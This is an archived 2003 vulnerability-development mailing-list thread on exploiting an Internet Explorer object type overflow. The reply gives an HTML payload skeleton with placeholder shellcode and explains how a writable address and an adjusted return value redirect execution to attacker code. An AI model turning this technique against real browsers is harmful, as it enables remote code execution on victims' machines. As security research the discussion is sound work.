RE: Exploiting new IE Object Type Overflow

From: Brett Moore (brettat_private)
Date: Thu Jun 05 2003 - 20:16:16 PDT

Next message: Mike Caudill: "Re: Decision"

Previous message: Daan van de Linde: "Re: Decision"
In reply to: Dave: "Exploiting new IE Object Type Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

IE version:6.0.2800.1106

I too seem unable to replicate the overflow in a way described in the eEye
advisory, but there's always more than one way to skin a cat.

<object type="[/x64]AAAAAAAAAAAAXXXXNOPSLIDESHELLCODE">Cooler Than Centra
Spike</object>

causes an exception. "0x70bf6c55" reference memory at "0x58585858". can't be
written.
70BF6C55   mov         byte ptr [edi],al

By supplying a valid 'writeable' address we bypass this exeception and end
up with.

Unhandled exception. Access Violation at 0x41414141.

Having a look at the address that we used for the valid writeable address we
can see
a full copy of our exploit string.

Thus if we plug our writeable address instead of x, the write will copy out
shellode
to our 'known' writeable address space. Then by using an adjusted value for
the AAAA
we can jump straight to the 'known' location of our shellcode.

Hopefully Drew will make some comments around the difference's between
these. Perhaps
different buffer sizes affect different versions differently?.

Brett

-----Original Message-----
From: Dave [mailto:chaboyd77at_private]
Sent: Thursday, June 05, 2003 3:45 PM
To: vuln-devat_private
Subject: Exploiting new IE Object Type Overflow




Hi,

I've had really good success with basic overflows and have been trying to
attempt something moderate+. I've successfully duplicated the overflow (IE
Object Type) (ESP doesn't seem to be overwritten, but EDI is). However,
since the value located in EDI is referenced then program flow can be
controlled?? I just can't seem to do anything with EDX as stated in the
EEYE Advisory..

"This allows us to take control of key registers so as to run code that we
specify, which will be available at the EDX register.

On my system (2000 Pro SP3) EDX always has a value of 0 and nothing I do
changes its value or any other registers value (besides EDI).  Also, this
is different from a regular stack overflow as placing the address of a JMP
ESP in EDI doesn't always seem to be gauranteed to point to my code.

Is there something really easy I'm missing here?
Thanks,
Dave

Next message: Mike Caudill: "Re: Decision"
Previous message: Daan van de Linde: "Re: Decision"
In reply to: Dave: "Exploiting new IE Object Type Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 11:08:50 PDT